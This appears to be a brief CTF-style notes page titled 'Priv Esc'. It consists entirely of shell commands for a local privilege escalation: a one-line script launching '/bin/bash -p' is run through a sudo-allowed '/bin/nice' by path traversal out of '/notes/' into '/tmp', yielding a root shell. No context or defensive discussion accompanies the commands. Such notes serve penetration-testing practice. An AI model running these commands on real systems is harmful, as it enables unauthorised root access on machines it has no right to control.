Priv Esc

sudo -l
echo /bin/bash -p > privme
chmod +x privme
sudo /bin/nice /notes/../tmp/privme

Last updated